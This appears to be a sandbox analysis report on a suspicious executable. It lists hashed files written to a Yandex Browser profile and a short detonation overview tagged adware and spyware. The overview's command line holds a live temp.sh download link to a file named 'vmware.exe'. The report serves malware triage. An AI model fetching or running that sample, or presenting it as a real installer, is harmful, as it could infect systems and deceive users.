SHA1 6484f1af6b485d5096b71b344e67f4164c33dd1f
SHA256 7b5a4320fba0d4c8f79327645b4b9cc875a2ec617a557e849b813918eb733499
SHA512 94a693ab2ce3c59f7a1d35b4bcc0fd08322dad24ce84203060ceceaf3dac44c4c28413c28dcdab35d289f30f8e28223a43c11cb7d5e9a56d851eb697ff9b9b6b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\install_state.json

MD5 896fe0f125b9073f0620664fb05fd2b7
SHA1 dbbe5491a768f9bbc5c276dde5b70a1e9645de0a
SHA256 3b4b94958f27628a8b7f3151140e759cde030d654eb051716ad2cee0fb6a323d
SHA512 9184db90cdef45ada7c806b8e57c91d2c5ed51ad1f64623584dd729f99f3e058efc8494834ffd25aaa17b4b436c6a48c3f18da04c00b5199533adf7508bffafb

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\6ec20f29-20a2-48db-8b2d-19675288bad5.tmp

MD5 5554804d26357650a990498014c8537b
SHA1 9811f29ebf9d204c1c3f59fddb46f7407b3c003f
SHA256 c0f2f4beed6c28465606db60372dffe83c32f0f7f9321b48afc83454f1d17c65
SHA512 f82c54b4999175560c26a2e9cf4aee0509d235ab73db950de8132f8a4c5cf97180b2ac4cc5deada50a22d0b905b7b557aaeb056fa0b88feb6a669983e0a2aa9f

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Preferences

MD5 6e4d3d4c79f8ac8c8675477cbb25c024
SHA1 f86a231fd9ed45f217c18162c40b9dbd9c54833e
SHA256 31748f0440f1c3d4a07aab3c520e0c532626935f122f14f5571b9f75f02338df
SHA512 06dd2a86d3aa88f635d67e5259348b1c73657dd60c537dc567942a77548c737a1b42634fc56e960e315a0e053c871318973c1c6e33da9936655b10b1adbfb13c

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\a32ca639-3039-4908-a272-7413589e10d0.tmp

MD5 e83f8ddcd8a44db1f17574eb0f501331
SHA1 0b30ec881ad62158f896ea47f5c70db3806aefd6
SHA256 3bae34ca8c4ca34ad7177a57d3934891651bea573f72a7da8cdf004f897ffee3
SHA512 8a246ea1417825e1de0ee26af667c849175659441dac4c9f115d58ebb68abaac9245b231d787edfa72384ebdf0f170e871fca352b441faa41bc2984bc1a56223

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Secure Preferences

MD5 7a5961bce0d28140152b939abc5b48b6
SHA1 2532cd26a0b7ea6c21ee6060de12359571cebe05
SHA256 d187711372debfbacf0e785828e1bf6f62a00153f6176d5518c4525eeb2ceb0e
SHA512 5f76e8d49521898f2af733366470243cb112203d746706ca507cbd3bb6f8dfdd506cc36716c68d6cba1f2fb53d8f3db5bcc48e03a2e1953d2959e2243712e23c

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Preferences

MD5 ea40b8c00bb8d3c969fc4d368ea4dcf8
SHA1 3fcae526a90d3749bd956bb243d4d2c6a423bd04
SHA256 94e50b69f6e88264934a499d749263beaabcd78bedb6da5a9f989a92e28417e9
SHA512 db883fe0644944631f397f2447fcca50915c9b00d2a4092857cebdd315ec8bbfdb63e846ae3b458d782075069fd98a354460984215af3e1e83b676420c2897b0

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Secure Preferences~RFe5948d7.TMP

MD5 bf13c71034c7305dcd0adc40a09718ad
SHA1 8dd24d1b333f5d6a7364d135f8172ad1c3dd5739
SHA256 567f88c80e1d2f5d4b8bcdbdd1ee1476c7d15ebe9a31d95c2e799515957387fc
SHA512 22c981dea56edbc8f4f788bfcd0e3d2c85fc092ae1c6c557afb910f6bd6ca2aac5eb6235fc8ab1ba459b03c00d7094e3c60d73f9fde78a306742186a614ff5aa

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\DawnWebGPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\DawnWebGPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\DawnWebGPUCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\DawnWebGPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Preferences~RFe594760.TMP

MD5 d80cd0af81ed777f5d33605859f16884
SHA1 548fd5fdd537a7422e41a78afabc168d498c2ab8
SHA256 71fa222a7bafa85621fad160eb72d9847de109f869e51d2c9a910b6c49454524
SHA512 cde9cb84f11e10b2435754dd2b8a663958a33dbb42abc470e3609ad67acab176814e6e75ea6cfd577400602edf71cc975a2dbe41355e7ba7fd9b30013182864e

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\turboapp_db.json~RFe594b76.TMP

MD5 ed108e5046bf82b8d317c1b06a59dd6f
SHA1 94f3631ccb5a65898b5a465d4c1f87c19b5a78c3
SHA256 6147d588cb56ae69c4febdac727f75b8a1f12d79eeba0ca3bb8d1a62dee622a9
SHA512 2a3d5191a4fbfed2a249931de1e4db7bc9c8f346a77d2a37de64e7fc33e01f7add67c3f9ac81d55fe9de9c9ab9b67afaf909f6ed0ba0cb77a21b43a3ba39b73a

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\turboapp_db.json

MD5 2e519cc5a0676fa0e3c9b711ffe3e23b
SHA1 dd386b0e5170e8b866f7426ab904d6888d2f6c50
SHA256 fc53375b07c5a3106f2019cd7be2f8661316efd576ac59bc61f9e2fdc6a1fd04
SHA512 7c80a6850882d370dcff08fd50064495ad7397e2c7832dc89f9dac1bd7e30478f3ffeb5a0693d9adb8fdb262d9e05ef1eb3d0a65567a81071f6f84ea8ff4fe61

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\index-dir\the-real-index

MD5 5654b2eb9b74efb2803a17d2b8a71d00
SHA1 da46045492ff544926a05d745ffdcb8076f885f4
SHA256 5f33b53931d66ca8e2c44d3990a88b01b6b9635418cf84df8cc24a64e276be38
SHA512 f5110e9f644a9758c07376c5735a9f746de52d56baf6be26241df8d2533ade740870b5dbcdacf046932608d56629922393f9cbcbcfc5c1d001a334e94bb10e42

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\web_ntp_cache\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\turboapp_db.json

MD5 2199c37acbb0d29a83434a4ee5eb0e55
SHA1 5932157c35fd24bbb3ab7b548baa248892e199cf
SHA256 0b7cf955c7ccf27e80dae662067816c0d8720ee90355a042f0ebc2bd7e0d4ef6
SHA512 89b95f1ead85eb0088425d4a8a60de1d4aa05a5ebfe2a6d723e2730f9f2b9ec6720e6408de44afea3c84a2d1bf500b11c77f482d6c2bb1e89f043cfc57554ec0

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\26cb2d5567e6afdc_0

MD5 ebf635c5067d14952b5c893d254387cf
SHA1 46bede00c5b0af5a7c63a6d037857e33a1af3447
SHA256 6da6040ded0ab84bcf7077d75072f6447d488be3c97e5b0e10dd148e90d3634f
SHA512 a8017536530b4baa032b6ad7919927838f764d3c1639977311855594c128ab88c529293f7874acffc9ccd364700bb75c5eaacca46319204e0be7c17682ac9793

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\fef132170d47887d_0

MD5 d74686822341471290cd8a592617e2d9
SHA1 cb67ab66e21c484aa478422671d2a7616b9fc083
SHA256 1e27535f146707092e8ffa76693b7fabb798159187ce938a6831f661ebd68b2a
SHA512 0cae1122594f02b78208ff69c96ff0e098e3ede802642eb934264aeb31fddad1b7d0b9007dbddd5918253da9690f675e28982447d9aa60328baf36cb654d92d8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\8e22ab6f7be8784b_0

MD5 4df5f0978bc12ba21c8b71e6b5d0fe4d
SHA1 090cda36921c3ce8508584c804e67340f83bc4d7
SHA256 60848a4cb8df79886338d288e288ef517f962dffaef9b1d3c6c0b8fcdf88f197
SHA512 2c38b1697b31b91c4e22b90f3c4e1e3367704b42629a6bf42ea5c36dfd9299f1fae7930fc437844a7b5eedc7381ab00c756dc8c7b44ef99bbf98f24a5d389fa8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\256.png

MD5 a363094ba5e40a4760a9bf566e5defd3
SHA1 1e74e20f48ec878bd0b76448c722168879c5b387
SHA256 05ae2d6161a3acd83798ec56dbc45087e6aeb0a1376401f55aa46539b1d95559
SHA512 ce30f312cc08366aa588e75b229c178a83cf6d464a1051bd1118b81e5166085a2b1bcfbff97804f3e8662366b59f43a659e4b0e315dabad125f16ec9ad9ac379

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\128.png

MD5 363bbbffe31e45e3945aa0ff3b8cdd1d
SHA1 f223255a82218ddd45bdf54a0cf1e8b438a67edc
SHA256 39b835c3dcf4261025de83d49ab151f5af0bc1ed8845932065aa1a333f026684
SHA512 7bbfb3810a2bed3d2a8a899afa95412cca95fa6916b1684ae3182bd0ad28faa7076fdf328281d106a53c10385667729b4089b0050610e87eadef2f3ff54e80be

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\96.png

MD5 115decbc3eb53574b2582f15a0996e83
SHA1 598a1d495135f767be6d03cf50418615b22146b6
SHA256 07fbfbda84eb5467b120fb3f9b4e028077303098bac8c2934635b14bbda847e0
SHA512 af237ddb585ad38fd0fc3d0f0b75c60d0117e965a548bda055b2625f86ee7d91fedc840e1afa2fe80814f152732371255133faa21c3d774ca9691446541cf46c

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\64.png

MD5 6f5486bcca8c4ce582982a196d89ece5
SHA1 4648ae13d71b2ff681cabc5d0b5b4bb242cb78a2
SHA256 c870819a5c73e2ea5f94312bdf10fc56668d3311ef2eab6509b659efb456bb8d
SHA512 9a36d519a9cadf5b464a98082511906cc5f24c4218f6bc2ae323f6b38bf5fd413614807ef0d442801bfbc3b2ce2a0527b0f7be24fd51f49cbde6b5dfe2cafd7c

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\48.png

MD5 7cf35c8c1a7bd815f6beea2ef9a5a258
SHA1 758f98bfed64e09e0cc52192827836f9e1252fd1
SHA256 67c320fa485a8094fc91cd3fcd59a7c75d2474e3046a7eb274b01863257fbe01
SHA512 0bbebde654c9f44cf56b74fc1a9525b62c88724ec80658efede3cbb370c3a6d4f3e78df459bbd0559a51838f4a172bdfcd370bd5477038309024b77cd69f2a15

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\32.png

MD5 d2e7ab79b45eda7c4421f296abf37c52
SHA1 8490f4e098d50ec161e64db912f8430826daf2bc
SHA256 ded3490683fcf3c5b87803bb1835759df2b65831a6257a326709a708a1dd45ac
SHA512 094c2150f872e727980f84b6c011f13210d43cbfd9437825b3b014211c69d7bd3f6367e9913370b624ddad270cfe91c190ebf2c5f5fd4e082b5d6c85199cb6b1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\16.png

MD5 238b0e7dc06028db4b6aba8078740ffb
SHA1 5fd2309587993b371beabb7a9d039e0dba3006ba
SHA256 d159e510392f6da58c4d15cc098171d45c7b02a1362cbf7be7a2d47a1a10e7fc
SHA512 1dda4de21be647067c04dfc47174df39d0c6c1eeee3e9005211f908351b69d6a27ed268b5ec7480285fb203a95136a3a205f7bafb7eb5223a3dcbab0dadc0e5d

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Preferences

MD5 7a40bb6288f065bae4a7134105182c24
SHA1 52b2616415d5cef47924c06f354fb769023930f3
SHA256 e1b3448ff104f90e818a468c1aa37fd4dd494669e99b7f292f7dbd44882f30ca
SHA512 cdef50e0501cdaa0fca52b214f4b43a04d242e1ba4be331593df41d25fd0e8586d36acf801b28600906691b984163ed8ab6b33281933b3b402d7fec5d8ff8735

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\1ad10c4bb9e37138_0

MD5 e57ebaa421abb69c998b1c801b8a213e
SHA1 386a3166fd447d1ec8bf1f8daf51d81b4f9020d6
SHA256 fe43fa74b6a6c370af142d7ab14d8d89e610923ff0a00a5a777920e4c9d6fcff
SHA512 5ffbfee9970bfa19ff9242b08870ad1b4d3690363f05d7af792cabced98cb27fdafba3f1161f4fc1544ca34da1fa3ac418131f5210e3452e376456ed57377cb4

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\2a9877b782e7616c_0

MD5 39846803ac3f83839365ce751d1870e7
SHA1 1eac7e342ae8a1cbb09e01c2f2e658b06f45458d
SHA256 35a82e2e896ab0129a3a01aba72f20af0a5d09dc351c6d0250cd849c15dc090c
SHA512 063dd219c835a58206254301a7ac896580efdb6f762e0f1d81a9ebb56a19eb1bb842f87d1e233ca42d712f30881d9657c98edc3a1b0cb351ac986cb29444647d

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\292fbdd019f435bf_0

MD5 ce49ffd96f3a0f37fd409db959c5542c
SHA1 3603990c7bac5671509d136950c14e43bdf10db4
SHA256 8775e72567355d67ab5d1103b497b20fad47c61be6ca754e58f69633891a59f1
SHA512 5d150812ecb4e6b38343be33784da153c21a7b8cd6593398cb2b2857e300d9e1496d0ece9cdc600f8ad482e184e784d20420cfbd2add6187bcf41d7659aa2042

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\88a052183f2a4b12_0

MD5 a24ec308005470ad8ebf021f60f34c4e
SHA1 73d84ddf6a6dcf42cde5ca155efd7c2495aaee58
SHA256 a9500fc6c51d69be22f6c594dbe92c0eac32a505737120663cdad7096fc6b721
SHA512 3fb3d6187fd1cb40997b1124c0d3d9d6e64f77a465a439bd49d47c0556c28c35e226049f48d1dd46ff9bee810ab788f6131d522c86c7a31c1a6dfb97ff8a7998

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\de3b030126695833_0

MD5 45d06d56086c9b67cfb8b52c8d806ba7
SHA1 a86a2333ec99715ca6352e423a74a84d13b13036
SHA256 8aaefaa38fa069c69851f3261fbd6234352c358baefc9c0c1427d1483e2ef667
SHA512 8c263d46a5384923f5b71e73da8fdd34814b59fbd22f48c60867a68951161af24be6283bab67b68c86ee0ad725ad7e8c30c79b5449de3a7071c9538925b54283

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\25fecb7eba1124c3_0

MD5 df5239903c20374d11f3c757a1bbbcfd
SHA1 7bd4c2d2a26cc4f06aac6089d84822f7e5298d2f
SHA256 bc1738ff3d35f86808babcdd3d8a11603cf213e3abc907b8a9df133d9630856a
SHA512 f4561d450735f614cb4a2f14b23fc6298124f060106a1ad6df1176edc908cc40c91a69baff848f37ebd0c3abd8fe8709fd52d7c7d38fb07b2dfea5fb4c87dd3c

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\26986cc774600b65_0

MD5 e639c233ce080d788d8f0e6a3477fa48
SHA1 3a27ce65eef3d1461e157291d45aeab1bc7b0438
SHA256 5711ea052329a3a27a73fd195d33f4f1016649e6383167bb0626b07a070034f0
SHA512 55320631d4496c4320b1728ab4273cb263983b3d5ff423a9876fef2a2bc86f247f5c4bc4c756485609f2ab3b25ed64ad0421912b43257ba875df210c20450a90

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\6d861d3c5a9afc0c_0

MD5 d256f73305bf5d044358e64ce8986a2f
SHA1 e28faba7f00fe14ab0642b19af0e4833bbe05514
SHA256 6cc735cdc0f34a8ed614d884f8df4adc1c50d7afffad3668747103090a0d9cf7
SHA512 2a9d0b0b7185e6be42a8d365813e2cc9d2a012e392c69bd1972a7a3437511dabe37054c8c4f98a0e9bbbf23fd7f80766be858b39d75b9273a3a16e88d7104154

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\5128ede85833242e_0

MD5 bee1c94006f703548bd3eb0ba17230e4
SHA1 1f6a91404255ddd024e35048772bfa57396590c2
SHA256 d0f016d16bb9faee831f2713c2b2f6b2ea40ce29990a0e9f25c8e10f24de5fc7
SHA512 7a6face339d3f3934d78bbcbb11e4f716130e51d806eddc8b57502acef0b434f34a8d92c02815ef7fbdbcf7785af0183ed8761e190ee6e449de2ebcb1e342e29

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\a81966f4be168991_0

MD5 3ae0f5a4fd05d891bff56d4c0f41d325
SHA1 2f3915d6c7d452f9c75b088076bd22309549fdf0
SHA256 a69351d19806788f8c0e768cef3cc8574cefc855ebfbcd3f655de010def8519a
SHA512 853c1905cc18e534c8d73829d6278c33571cd41639e02a52e7453d97039d4fee5c50a6c5b53cbe5900db53d02abe0ec5dd896d9e93959ea29afd12ff8ec01bf2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\TransportSecurity

MD5 226bf574e1d1270fefb439dd606bb831
SHA1 ddea469509b3ce86634c29047495ae4927c8855e
SHA256 029b35d6f9e4ddb96e1dcb36fd43367c536437faa0fe246bbc34430660a603af
SHA512 c8578a3c414bcdae04766ecd99e145e7df9f4d59fa16cbaacd9f3f4f975545a1bb45fb221477ed10d8c1ed6e62c3f69a8eaf495946118b94dd279180ec97079f

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\TransportSecurity~RFe599a33.TMP

MD5 f29f28d472810910b03e6cd896b875a1
SHA1 6e84b0593c1122ce2ac6396df4402284119a6009
SHA256 54aca48f3f184375ece7746c23100cbce24d09be54a8f2c41263da5de4fb4ba2
SHA512 36985adfeedc1ab173cbd9b9f608d6a9e818c2908f92a538b5310d7841b6668a2dc0c911c58ea081159514952c13b99293a5d5181be21038f88b6f2e9737bd82

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\google_import_script\24.4.23.0\script

MD5 b807ebd3002f71c1de6deb285528a920
SHA1 14b2c18684174abd078600bc9ac95628c00ea952
SHA256 8b44c53ea53b3ff1465263dec2380c68e88e4964984dbdc1497ff2aeedb010d6
SHA512 2885e6e91a8ddb346b15ee22f8bd0ea4735314d16a7a480c999b890fc3fcf68e5ab7ee137c7e788f1652f889f23ed920e70cd58bd9300a1e0af44babeeb9fdab

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\google_import_script\24.4.23.0\_metadata\yandex\verified_contents.json

MD5 683c4594670f2cfde98a198091bf1889
SHA1 3d6e271a452024422213183980bcf510226648ec
SHA256 d38c186b9c02f7db4aeaa4326e5012470c3eaffc1f40553761b5db62f6c1d344
SHA512 62a24ff8f7d2fe1f5fe1793719b2e3f964ab97552e0c75835f299c8ae3cdd4f92ab71c3c4baead8d234176e96672baa787fdc043ebc2686f6639cbf494c7ab4c

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\Temp\chrome_Unpacker_BeginUnzipping10208_851726657\manifest.json

MD5 29012066e78d4e28ea709f43e49c9cc5
SHA1 88c04e80be6ad489b271f3f86a4f1c6d29c53f67
SHA256 711594a302c5158486932dc5a5a080a8e7d2542a8c36da00cb8cc388a08a99b1
SHA512 d4dd602aa722bd46fd9477e7b167e65285003594fd6ece49523533913e8281a4bbe1d971fa7fbbb0baf3944aba1d19b5f3a2c6b56dc1101bcdc6a53905f511ca

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\fd41ca2a883063a6_0

MD5 33904d82f43c90b5e9ffb866e4066b7c
SHA1 ce9ec159724ee3d72e3299fad2d63bd1a5add7e6
SHA256 986899c2b72631e9299c4147d5312dcc8a2417a27a22739c81041ebbc32f75d8
SHA512 862d44599fd039e1d5d7319e3100642e89f0aa1da9cd629ed2ec9cda09543665d64d201039ecc77d49bd4961b9534304d156141c2d73e3bed3d698247ff9073e

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\72c2e20ca5d250b9_0

MD5 fe144e8a946692c1fdbbc1e94d5aab9e
SHA1 8e93027375dce95f4373e2c38aa3c57634240d48
SHA256 e9532c23d55b0620c0a6dee30de083b2993c5fbf497fec4de854cfb1262077af
SHA512 815b2ee2e1ab7c5bd4098555ca948b37e473671d6189d1aa8fe6ed381453555b80fd4f118c74cf58e581c33d4066eab4552673da52f5aebb1fe87c1099cd885b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\9c1d7216fb32fb2b_0

MD5 c79374430f99c63078cd9dea8669d627
SHA1 081ab48ee9093d1b0eb1cc5e773a81a2a3c431ea
SHA256 a2b872d715662ed1b369c06b4ee179dee8036e65dadab70f7753f8cfa143392b
SHA512 bdba70c40a19dc1a47e2c2efaf866d8547f810bbec627956652a301df789e46aee9f50be1a5fa89f447f89febd829404cfed35a60706733dc2122e5306add136

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\e7d083353a620397_0

MD5 400d22f91fdbd17ad45b1a39743c69dd
SHA1 fa38d5d97dda5336895e593dd029d224006b242a
SHA256 f3f3a7cd6966e3aec87065042f6b1efac1747fe68d3f676c9a16b86c2dd03fa3
SHA512 6ec61a1a277acd448a7bc0c8539aa06819edff1eeab5153e1a6f758309d93d1715bb3d3fdd1c8b01a101203c2a09d356efc2690f47db27ce08eb014d685d68ae

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\YandexDictionaries\ru.bdic

MD5 ac3768f0462853d08df284e67c7c4ebd
SHA1 732581ac6f2e02246696817adc53d2e2e5d0dcb5
SHA256 af2bcc135f974aad505a8f55296117dbf4cbc095931e22f424698b181d273656
SHA512 27d558deffeeefe1198aebdf65a3fef0b0f3d6b6c4177d03ff32b0363f0a2fb1b7ff6454f45dd3254427cec9174b03181c50bc51dba212e6ab0114a6e72bcf96

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\7cf11c68b79887d2_0

MD5 d3f933a65fa6b31cb31943910e039e93
SHA1 29576c3d01aa653393ba2fd79cf860118a0d2478
SHA256 0fb658f3b84f6a2eaa127b14ad6337af02d3533e7c528366208dc4d3bea1d592
SHA512 560acc1aeb2a1c6a697cb3bfc60c5ff4cc3a4654f90950efa7e5893c229702e5935e34de2a34f238c6cb361cc1e9973c96ded256fcfdf71fe4618f0a7accf769

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\55811988-650c-4420-b0e4-915381989e88\cd4004d6793712fa_0

MD5 48e994bd49609bf2c6ec3226e26568c4
SHA1 8535734f7ce3b5ed311d8963ae8b56cd03b4c6cf
SHA256 07b5a34147de359b6ce2098c091ee3d6bf159fb1dce6fc7cad9284328dc6b8b1
SHA512 c59584dc08260820e1446f2b105050d45f04e9a87a8aa3fd23fbd278d666f59fbe79721d2faa1cd7eca1265abd8f0c7ae0d0e815d5564ff46e83cdbdaf1b4d00

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Preferences

MD5 732f58325bbf4d541d32b2fc46789dd6
SHA1 d03c59ede348c8540d1112d23e5c2e89f037bae2
SHA256 b37efb04e988e9954436fb6417cec11c2334ec34fd09517274aa132faa010e8b
SHA512 f42dd269ac8ee4de2a7641c67b5a4dca54394b09d09c2374dc7a4a647dbce3878f452a18b463c9025a658130da02b0e75de14f188f2e6ab17fc5f6d999917777

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-23 21:54

Reported

2024-06-23 21:55

Platform

win11-20240508-en

Max time kernel

49s

Max time network

49s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

Signatures

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" C:\Program Files\Internet Explorer\iexplore.exe N/A
